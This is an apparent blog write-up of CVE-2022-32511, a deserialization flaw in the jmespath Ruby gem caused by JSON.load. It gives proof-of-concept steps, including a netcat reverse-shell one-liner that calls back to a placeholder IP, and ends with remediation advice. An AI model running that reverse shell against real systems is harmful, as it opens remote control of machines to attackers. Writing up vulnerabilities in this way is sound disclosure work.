CVE-2022-32511 | Exploit | Remote Code Execution

Dhanesh Dodia - HeyDanny
Published in InfoSec Write-ups
2 min read, Jun 29, 2022


Description:

The jmespath Ruby gem, in versions 1.6.0 and earlier, is vulnerable to Deserialization of Untrusted Data because it parses caller-supplied JSON with JSON.load. JSON.load enables the json gem's create_additions behaviour: when a JSON object carries a json_class key, the loader looks up the named class and calls its json_create method with that object, so untrusted input gets to choose which classes are instantiated. Publicly known gadget chains built from classes already present in Ruby and RubyGems turn that into arbitrary command execution, which is what the proof-of-concept below relies on.

Proof-of-concept

1. To reproduce the issue, first install the jmespath gem at version 1.6.0 or earlier:

gem install jmespath -v 1.6.0

2. Start the Interactive Ruby Shell, in which the library will be loaded:

irb

3. If irb is not installed, install it with:

gem install irb

4. Pick a payload. The one used here is the netcat reverse shell from pentestmonkey's reverse shell cheat sheet; replace IP with the address of your listener and have it waiting (for example nc -lvnp 1234) before triggering the exploit:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f

5. Finally, require the vulnerable jmespath library in irb and hand it JSON that carries the payload. When the library passes that data to JSON.load, the deserialization instantiates the attacker-named classes and the reverse shell connects back.

Conclusion

Use JSON.parse instead of JSON.load for any input that is not fully trusted: JSON.parse leaves json_class as an ordinary key and returns plain Hash, Array and scalar values, whereas JSON.load instantiates whatever class the input names. That is exactly what happened here: JSON.load did not validate the input data, so attacker-controlled JSON led to remote code execution. Applications that depend on jmespath should upgrade to 1.6.1 or later, which replaced the JSON.load call with JSON.parse.
